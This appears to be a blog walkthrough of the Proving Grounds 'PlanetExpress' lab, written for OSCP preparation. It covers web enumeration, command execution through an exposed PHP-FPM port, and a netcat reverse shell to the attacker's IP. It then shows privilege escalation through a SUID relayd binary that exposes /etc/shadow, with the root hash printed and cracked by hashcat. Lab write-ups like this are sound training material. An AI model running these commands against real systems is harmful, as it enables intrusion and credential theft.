Proving grounds:PlanetExpress
3 min readDec 6, 2022
Today we will take a look at Proving grounds: PlanetExpress. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network scan
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-generator: Pico CMS
|_http-title: PlanetExpress — Coming Soon !
|_http-server-header: Apache/2.4.38 (Debian)
9000/tcp open cslistener?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel- Pico (80)
gobuster dir -u http://192.168.168.205 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt
/config (Status: 301) [Size: 319] [--> http://192.168.168.205/config/]ffuf -u http://192.168.168.205/config/FUZZ -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -fw 20
/config.yml [Status: 200, Size: 812, Words: 96, Lines: 60, Duration: 413ms# Plugins: https://github.com/picocms/Pico/tree/master/plugins
#
plugins_url: ~
DummyPlugin.enabled: false
PicoOutput:
formats: [content, raw, json]
##
# Self developed plugin for PlanetExpress
#
#PicoTest:
# enabled: true http://192.168.168.205/plugins/PicoTest.php
- cslistener (9000)
└─# python fpm.py -c "<?php passthru('id'); ?>" -p 9000 192.168.168.205 /var/www/html/planetexpress/plugins/PicoTest.php | head -n 10
Content-type: text/html; charset=UTF-8
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; color: #222; font-family: sans-serif;}
pre {margin: 0; font-family: monospace;}
a:link {color: #009; text-decoration: none; background-color: #fff;}
a:hover {text-decoration: underline;}
Exception ignored in: <_io.TextIOWrapper name='<stdout>' mode='w' encoding='utf-8'>
BrokenPipeError: [Errno 32] Broken pipeReverse shell
python fpm.py -c “<?php passthru(‘nc 192.168.49.168 80 -e /bin/bash’); ?>” -p 9000 192.168.168.205 /var/www/html/planetexpress/plugins/PicoTest.php | head -n 10- Privesc(relayd)
find / -user root -perm -4000 -exec ls -ldb {} \; 2> /dev/null
-rws---r-x 1 root root 3644754 Jan 10 2022 /usr/sbin/relaydwww-data@planetexpress:~/html/planetexpress/plugins$ ls -l /etc/passwd
-rw-r--r-- 1 root root 1385 Jan 10 2022 /etc/passwd
www-data@planetexpress:~/html/planetexpress/plugins$ ls -l /etc/shadow
-rw-r----- 1 root shadow 940 Jan 10 2022 /etc/shadow
adowdata@planetexpress:~/html/planetexpress/plugins$ /usr/sbin/relayd -C /etc/sh
[ERR] 2022-12-06 12:10:29 config.cpp:1539 write
[ERR] 2022-12-06 12:10:29 config.cpp:1213 open failed [/usr/etc/relayd/misc.conf.tmp.12217]
[ERR] 2022-12-06 12:10:29 config.cpp:1189 bad json format [/etc/shadow]
www-data@planetexpress:~/html/planetexpress/plugins$ ls -l /etc/shadow
-rw-r--r-- 1 root shadow 940 Jan 10 2022 /etc/shadow
www-data@planetexpress:~/html/planetexpress/plugins$ cat /etc/shadow
root:$6$vkAzDkveIBc6PmO1$y8QyGSMqJEUxsDfdsX3nL5GsW7p/1mn5pmfz66RBn.jd7gONn0vC3xf8ga33/Fq57xMuqMquhB9MoTRpTTHVO1:19003:0:99999:7:::- Hashcat
hashcat.exe -m 1800 -a 0 hash.txt rockyou.txt
www-data@planetexpress:~$ su root
Password:
root@planetexpress:/var/www# whoami
root
root@planetexpress:/var/www# id
uid=0(root) gid=0(root) groups=0(root)And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”
